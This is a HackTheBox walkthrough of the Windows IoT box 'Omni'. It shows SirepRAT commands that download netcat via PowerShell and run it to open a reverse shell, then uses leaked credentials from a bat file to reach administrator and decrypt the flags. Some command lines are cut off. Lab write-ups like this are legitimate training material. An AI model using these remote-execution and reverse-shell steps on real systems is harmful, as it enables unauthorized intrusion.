Omni, a Windows IOT box created by HackTheBox user egre55, was an overall easy difficulty box. The initial foothold was about finding SirepRAT
issue on Windows IOT machines and using that to get a shell on the box. Enumerating the box, we find a bat file in C:\Program Files\WindowsPowerShell\Modules\PackageManagement
using port 8080
we can get reverse shell as app
user and then as Administrator
Inital Enumeration
1 | # Nmap 7.80 scan initiated Sun Aug 23 09:36:01 2020 as: nmap -Pn -sC -sV -oN nmap/omni |
Which reveal it is somekind of windows server and two ports are open 135
and 8080
So Lets start with 8080
Web (PORT:8080)
Checking the page don’t reveal anything just asked for a credential.
Lets run gobuster and move to 135
MSRPC (Port:135)
Enumerating this we don’t find anything.
My current goal was to find any credential which i could use on port 8080
Lets get back to the whiteboard and look it from another angle. we know this is an windows IOT
box based on Windows Device Portal
Lets look for some exploit for that
I cloned SirepRAT and lets try that.
1 | python GetSystemInformationFromDevice |
get us an output. Okay now we can get a revese shell by uploading nc and executing it.
Uploading ncat
1 | python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell iwr -OutFile C:\\Windows\\System32\\spool\drivers\\col |
Executing ncat
1 | python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\drivers\\color\\nc.exe 1234 -e powershell" |
which give us a reverse shell
Trying whoami
didn’t work for us but we can get user by $env:UserName
Enumerating we find
an intresting file in C:\Program Files\WindowsPowerShell\Modules\PackageManagement
which is creating a user
1 | net user app mesh5143 |
as you can see there are two credentials in r.bat file so using this credentials we can log-in to the web application of the machine (Remember web serer running on Port 8080)
log in via app:mesh5143
Enumerating more we check another drive
we are app now we can read user.tx
t file but content looks encrypted we need to decrypt it
for that we need to execute the following command
1 | $c = Import-CliXml -Path U:\Users\app\user.txt |
we got user flag now lets capture the root flag
Privilege Escalation
Remember we found two usernames in r.bat file? Let’s use the second one, the Administrator.
Close Firefox and start it again.
Login via: administrator:_1nt3rn37ofTh1nGz
Start another Netcat
We get a reverse shell.
Now lets decrypt the root.txt
1 | $c = Import-CliXml -Path U:\Users\administrator\root.txt |